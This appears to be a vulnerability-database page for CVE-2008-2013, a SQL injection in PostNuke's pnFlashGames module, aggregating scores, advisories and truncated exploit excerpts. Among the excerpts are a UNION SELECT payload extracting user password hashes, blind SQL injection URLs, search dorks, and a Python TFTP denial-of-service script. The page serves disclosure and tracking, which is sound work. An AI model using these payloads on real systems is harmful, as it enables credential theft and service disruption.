CVE-2008-2013
published 2008-04-30CVE-2008-2013: SQL injection vulnerability in index.php in the pnFlashGames 1.5 through 2.5 module for PostNuke, when magic_quotes_gpc is disabled, allows remote attackers to…
PriorityP335medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.04%
59.8th percentile
SQL injection vulnerability in index.php in the pnFlashGames 1.5 through 2.5 module for PostNuke, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter in a display action.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pnflashgames | pnflashgames | — | — |
| pnflashgames | pnflashgames | — | — |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
cisa7.8HIGH
vendor_redhat6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r3cp-px3w-cp2q: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-01
CVE-2008-2013 [MEDIUM] CWE-89 GHSA-r3cp-px3w-cp2q: SQL injection vulnerability in index
SQL injection vulnerability in index.php in the pnFlashGames 1.5 through 2.5 module for PostNuke, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter in a display action.
CISA
Microsoft Malware Protection Engine Improper Restriction of Operations Vulnerability
cisa·2022-03-03·CVSS 7.8
CVE-2017-8540 [HIGH] CWE-119 Microsoft Malware Protection Engine Improper Restriction of Operations Vulnerability
Vulnerability: Microsoft Malware Protection Engine Improper Restriction of Operations Vulnerability
Affected: Microsoft Malware Protection Engine
The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016, Microsoft Exchange Server 2013 and 2016, does not properly scan a specially crafted file leading to memory corruption. aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability".
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-8540
Remediation Due Date: 2022-03-24
Red Hat
bind: localnets ACL bypass caused by WinSock API bug
vendor_redhat·2013-11-06·CVSS 6.8
CVE-2013-6230 [MEDIUM] bind: localnets ACL bypass caused by WinSock API bug
bind: localnets ACL bypass caused by WinSock API bug
The Winsock WSAIoctl API in Microsoft Windows Server 2008, as used in ISC BIND 9.6-ESV before 9.6-ESV-R10-P1, 9.8 before 9.8.6-P1, 9.9 before 9.9.4-P1, 9.9.3-S1, 9.9.4-S1, and other products, does not properly support the SIO_GET_INTERFACE_LIST command for netmask 255.255.255.255, which allows remote attackers to bypass intended IP address restrictions by leveraging misinterpretation of this netmask as a 0.0.0.0 netmask.
Statement: Not vulnerable. This flaw only affected BIND on Microsoft Windows platforms with a flawed WinSock call. This vulnerability does not affect BIND on Linux or Unix platforms.
Package: bind (Red Hat Enterprise Linux 5) - Not affected
Package: bind97 (Red Hat Enterprise Linux 5) - Not affected
Package: bind (R
Red Hat
kvm: qemu-nbd block format auto-detection vulnerability
vendor_redhat·2013-04-15·CVSS 4.9
CVE-2013-1922 [MEDIUM] kvm: qemu-nbd block format auto-detection vulnerability
kvm: qemu-nbd block format auto-detection vulnerability
qemu-nbd in QEMU, as used in Xen 4.2.x, determines the format of a raw disk image based on the header, which allows local guest OS administrators to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted, a different vulnerability than CVE-2008-2004.
Statement: Not vulnerable.
This issue does not affect versions of kvm and xen packages as shipped with Red Hat Enterprise Linux 5. This issue does not affect versions of qemu-kvm packages as shipped with Red Hat Enterprise Linux 5 and 6.
Package: kvm (Red Hat Enterprise Linux 5) - Not affected
Package: qemu-kvm (Red Hat Enterprise Linux 6) - Not affected
No detection rules found.
Exploit-DB
Microsoft Excel - OLE Arbitrary Code Execution
exploitdb·2017-09-30
CVE-2017-0199 Microsoft Excel - OLE Arbitrary Code Execution
Microsoft Excel - OLE Arbitrary Code Execution
---
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it´s possible to exploit it through Excel too, however the target would ne
Exploit-DB
Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
exploitdb·2014-10-20
CVE-2014-6352 Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows
Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be
vulnerable. However, based on our testing, the most reliable setup is on Windows platforms
running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such
as using
Exploit-DB
EMC AlphaStor Device Manager Opcode 0x75 - Command Injection (Metasploit)
exploitdb·2014-09-24
CVE-2013-0928 EMC AlphaStor Device Manager Opcode 0x75 - Command Injection (Metasploit)
EMC AlphaStor Device Manager Opcode 0x75 - Command Injection (Metasploit)
---
require 'msf/core'
class Metasploit3 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',
'Description' => %q{
This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75
command, the process does not properly filter user supplied input allowing for arbitrary
command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116
with Windows 2003 SP2 and Windows 2008 R2.
},
'Author' =>
[
'Anyway ', # Vulnerability Discovery
'Preston Thornburn ', # msf module
'Mohsan Farid ', # msf module
'Brent Morris ', # msf module
'juan vazquez' # convert aux module into exploit
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-0928'],
['ZDI', '13-033']
]
Exploit-DB
McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - 'ePowner' Multiple Vulnerabilities
exploitdb·2014-04-28·CVSS 7.9
CVE-2013-0140 [HIGH] McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - 'ePowner' Multiple Vulnerabilities
McAfee ePolicy Orchestrator 4.6.0 4.6.5
# Tested on: Windows 2003/2008
# CVE : CVE-2013-0140 , CVE-2013-0141
# More info on: http://funoverip.net/?p=1685 & https://github.com/funoverip/epowner
PoC:
v0.2.1- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33071-2.tar.gz (epowner-0.2.1.zip)
INTRODUCTION
- In short, this tool registers a rogue agent on the ePo server and then takes advantage of the
following vulnerabilities to perform multiple actions :
- CVE-2013-0140 : Pre-auth SQL Injection
- CVE-2013-0141 : Pre-auth Directory Path Traversal
- The tool manages the following actions, called "mode" :
-r, --register Register a new agent on the ePo server (it's free)
--check Check the SQL Injection vunerability
--add-admin Add a new web admin account into
Exploit-DB
HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)
exploitdb·2014-03-10
CVE-2013-2347 HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)
HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'HP Data Protector Backup Client Service Remote Code Execution',
'Description' => %q{
This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code
execution. The vulnerability exists in the EXEC_BAR operation, which allows to
execute arbitrary processes. This module has been tested successfully on HP Data
Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.
},
'Author' =>
[
'Aniway.Anyway ', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2347' ],
[ 'BID', '6464
Exploit-DB
HP Data Protector - 'EXEC_BAR' Remote Command Execution
exploitdb·2014-02-16·CVSS 10.0
CVE-2013-2347 [CRITICAL] HP Data Protector - 'EXEC_BAR' Remote Command Execution
HP Data Protector - 'EXEC_BAR' Remote Command Execution
---
import argparse
import socket
"""
Exploit Title: HP Data Protector EXEC_BAR Remote Command Execution
Exploit Author: Chris Graham @cgrahamseven
CVE: CVE-2013-2347
Date: February 14, 2014
Vendor Homepage: www.hp.com
Version: 6.10, 6.11, 6.20
Tested On: Windows Server 2003, Windows Server 2008 R2
References:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422
http://www.zerodayinitiative.com/advisories/ZDI-14-008/
Details:
The omniinet service, which runs by default on port 5555, is susceptible
to numerous remotely exploitable vulnerabilities. By sending a malicious
EXEC_BAR packet (opcode 11), a remote attacker can force the omniinet
service to run an arbitrary command. On Windows, the omnii
Exploit-DB
Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)
exploitdb·2013-12-03
CVE-2013-5486 Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)
Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Cisco Data Center Network Manager. The
vulnerability exists in processImageSave.jsp, which can be abused through a directory
traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
application server feature is used to achieve remote code execution. This module has been
tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
(64 bits).
},
'Author'
Exploit-DB
HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow
exploitdb·2013-10-02
CVE-2013-5680 HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow
HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow
---
Details
Application: "HylaFAX+"
Version: 5.2.4 (April, 2008) through 5.5.3 (August 6, 2013)
Type: Daemon that manages a fax server via an FTP-like protocol.
Vendor / Maintainer: Lee Howard (faxguy _at_ howardsilvan.com)
Project Homepage: http://hylafax.sourceforge.net/
Vulnerability: CWE-120: Classic buffer overflow from unchecked network
traffic, resulting in heap corruption.
Vulnerability Discoverer: Dennis Jenkins (dennis.jenkins.75 _at_ gmail.com)
CVE reference: CVE-2130-5680, 2013-09-03
Solution Status: Fixed by vendor.
Description
"HylaFAX™ is an enterprise-class open-source system for sending and
receiving facsimiles as well as for sending alpha-numeric pages."
Vulnerability
HylaFAX+ contains a daemon, "hfaxd", that allows a "fax cl
Exploit-DB
Ovidentia 7.9.4 - Multiple Vulnerabilities
exploitdb·2013-08-22
CVE-2008-4423 Ovidentia 7.9.4 - Multiple Vulnerabilities
Ovidentia 7.9.4 - Multiple Vulnerabilities
---
Ovidentia 7.9.4 Multiple Remote Vulnerabilities
Vendor: Cantico
Product web page: http://www.ovidentia.org
Affected version: 7.9.4
Summary: Ovidentia is both a content management system (CMS) and
a collaborative environment (Groupware).
Desc: Input passed via several parameters is not properly sanitized
before being returned to the user or used in SQL queries. This can
be exploited to manipulate SQL queries by injecting arbitrary SQL
code and HTML/script code in a user's browser session in context of
an affected site.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.7
MySQL 5.5.25a
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5154
Advisory URL: http://www.z
Exploit-DB
Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)
exploitdb·2013-07-23
CVE-2013-3174 Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)
Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)
---
Introduction:
The Microsoft DirectShow application programming interface (API) is a media-streaming architecture for Microsoft Windows. Using DirectShow, your applications can perform high-quality video and audio playback or capture.
Overview:
DirectShow in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted GIF file, aka "DirectShow Arbitrary Memory Overwrite Vulnerability."
Disclosure Timeline
2013-03-20 - Vulnerability reported to vendor
2013-07-09 - Coordinated public release of advisory
Details:
Microsoft's DirectShow API is vulnerable to
Exploit-DB
Quick TFTP Server Pro 2.2 - Denial of Service
exploitdb·2013-06-07
CVE-2008-1610 Quick TFTP Server Pro 2.2 - Denial of Service
Quick TFTP Server Pro 2.2 - Denial of Service
---
#!/usr/bin/python
#Exploit Title: Quick TFTP Server 2.2 DoS
#Date: 6th June 2013
#Exploit Author: npn
#Exploit Author Homepage: http://www.iodigitalsec.com/
#Exploit Author Write Up: http://www.iodigitalsec.com/blog/fuzz-to-denial-of-service-quick-tftp-server-2-2/
#Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
#Software Link: http://www.tallsoft.com/tftpserver_setup.exe
#Version: 2.2
#Tested on: Windows XP SP3 English
from socket import *
import sys
import select
pwn = "\x00\x02"
pwn += "\x66\x69\x6c\x65\x2e\x74\x78\x74\x00"
pwn += "A"*1200
pwn += "\x00"
address = ('192.168.200.20', 69)
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.sendto(pwn, address)
Exploit-DB
Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring
exploitdb·2013-06-03
CVE-2013-3661 Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring
Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring
---
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include
#include
#include
#include
#include
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW")
#ifndef PAGE_SIZE
# define PAGE_SIZE 0x1000
#endif
#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000
//
// --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
// ----------------------------------------- taviso () cmpxchg8b com -----
//
// INTRODUCTION
//
// There's a pretty ob
Exploit-DB
ClipShare 4.1.1 - Multiples Vulnerabilities
exploitdb·2013-03-27
CVE-2008-5489 ClipShare 4.1.1 - Multiples Vulnerabilities
ClipShare 4.1.1 - Multiples Vulnerabilities
---
# Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilites
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Last Checked: 27 March 2013
# Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)
vuln file : gvideos.php , param : gid
Poc :
http://server/mavideo/gvideos.php?gid=1 [Blind]
#to exlploit this poc , must group to be added previously with some videos publics
Real exploitation :
http://server/mavideo/gvideos.php?gid=1 AND 1=1
==> return normal page
http://server/mavideo/gvideos.php?gid=1 AND 1=2
==> return page with some e
Exploit-DB
PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting
exploitdb·2008-06-04
CVE-2013-1748 PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting
PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting
---
PHP-Address Book (SQL/XSS) Multiple Remote Vulnerabilities
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 4 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : PHP-Address Book
VERSION :
http://[target]/[path]/index.php?group=
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
#########################################################
Exploit-DB
PostNuke Module pnFlashGames 2.5 - SQL Injection
exploitdb·2008-04-26
CVE-2008-2013 PostNuke Module pnFlashGames 2.5 - SQL Injection
PostNuke Module pnFlashGames 2.5 - SQL Injection
---
Vuln: Postnuke Mod pnFlashGames (Blind SQL/SQL) all version Vulnerability
Author: Vulnerability search Kacper (kacper1964_at_yahoo.pl)
dork: inurl:"index.php?module=pnFlashGames"
Author Homepage: http://devilteam.pl/
If magic_quotes_gpc = off
Vuln to old >2 version:
index.php?module=pnFlashGames&func=display&id=-1+union+select+concat(pn_uname,char(58),pn_pass),1,2,3,4,5,6,7,8+from+nuke_users+where+uid=2/*
Vuln to new version 1.5 == 2.5
[code]
\n";
echo "Login: Kacper Password:".$cryptpass;
@set_time_limit(0);
@ini_set("display_errors","0");
$hostname = gethostbyname($address);
function getid()
{global $hostname;
$responce = "";
$fsock = fsockopen($hostname,80,$errnum,$errstr,2);
$headers = "POST ".address."index.php?module=pnFl
Bugzilla
CVE-2013-6474 cups-filters: heap-based buffer overflow flaw in pdftoopvp
bugzilla·2013-11-07·CVSS 6.8
CVE-2013-6474 [MEDIUM] CVE-2013-6474 cups-filters: heap-based buffer overflow flaw in pdftoopvp
CVE-2013-6474 cups-filters: heap-based buffer overflow flaw in pdftoopvp
A heap-based buffer overflow flaw was found in the pdftoopvp filter. If a malicious PDF file were processed, it could lead to arbitrary code execution with the privileges of the "lp" user. This issue was due to the following fix not being present in pdftoopvp:
https://bugs.freedesktop.org/show_bug.cgi?id=17326
http://lists.freedesktop.org/archives/poppler/2008-August/004021.html
Acknowledgements:
This issue was discovered by Florian Weimer of the Red Hat Product Security Team.
Discussion:
Public via:
http://bzr.linuxfoundation.org/loggerhead/openprinting/cups-filters/revision/7176
This issue has been resolved in upstream cups-filters-1.0.47
---
Created cups-filters tracking bugs for this issue:
Affects: fed
Bugzilla
CVE-2013-2049 CloudForms Management Engine 2: static secret_token.rb value
bugzilla·2013-05-03·CVSS 7.5
CVE-2013-2049 [HIGH] CVE-2013-2049 CloudForms Management Engine 2: static secret_token.rb value
CVE-2013-2049 CloudForms Management Engine 2: static secret_token.rb value
Ruby on Rails uses a HMAC for verifying the integrity of signed cookies. To prevent session hash tampering, a digest is calculated from the session with a server-side secret and inserted into the end of the cookie.
It was found that CloudForms Management Engine (CFME) is using a statically defined secret, which is common across all deployments. A remote attacker could use this statically defined secret to perform a session tampering attack.
External references:
http://blog.phusion.nl/2013/01/04/securing-the-rails-session-secret/
http://blog.mhartl.com/2008/08/15/a-security-issue-with-rails-secret-session-keys/
Discussion:
Acknowledgements:
This issue was discovered by Ramon de C Valle of the Red Hat Product S
Bugzilla
CVE-2013-1922 qemu, qemu-kvm, kvm: qemu-nbd block format auto-detection vulnerability
bugzilla·2013-03-19·CVSS 4.9
CVE-2013-1922 [MEDIUM] CVE-2013-1922 qemu, qemu-kvm, kvm: qemu-nbd block format auto-detection vulnerability
CVE-2013-1922 qemu, qemu-kvm, kvm: qemu-nbd block format auto-detection vulnerability
A security flaw was found in the way qemu-nbd, the QEMU Disk Network Block Device server tool of QEMU, performed detection of image formats (the image format has been previously autodetected). A guest operating system administrator could write a header to particular raw disk image format, describing another format than original one for that disk image, leading to scenario in which after restart of that guest, QEMU would detect new format of the image, and could allow the guest to read any file on the host if QEMU was sufficiently privileged.
A different vulnerability that CVE-2008-2004.
Discussion:
Acknowledgements:
This issue was found by Daniel Berrange of Red Hat.
---
Created attachment 712650
P
Bugzilla
CVE-2013-1927 icedtea-web: GIFAR issue
bugzilla·2012-12-06·CVSS 9.0
CVE-2013-1927 [CRITICAL] CVE-2013-1927 icedtea-web: GIFAR issue
CVE-2013-1927 icedtea-web: GIFAR issue
Current IcedTea-Web versions are affected by GIFAR issue. It is possible to combine GIF image with Java JAR into a single file, that is both valid GIF as well as valid JAR/ZIP file. This issue can be used to execute Java applet in the context of the site that allows untrusted users to upload images in GIF format.
This problem was previously fixed in Oracle and IBM Java plugins as CVE-2008-5343 (bug 474790).
References:
http://en.wikipedia.org/wiki/Gifar
http://xs-sniper.com/blog/2008/12/17/sun-fixes-gifars/
http://riosec.com/how-to-create-a-gifar
Discussion:
Created attachment 659469
proposed patch
This patch is fixing the issue. Troubles will come when not just zip jars will be used (and so jar header will change) - eg pack2000 in jdk8.
Otherwi
2008-04-30
Published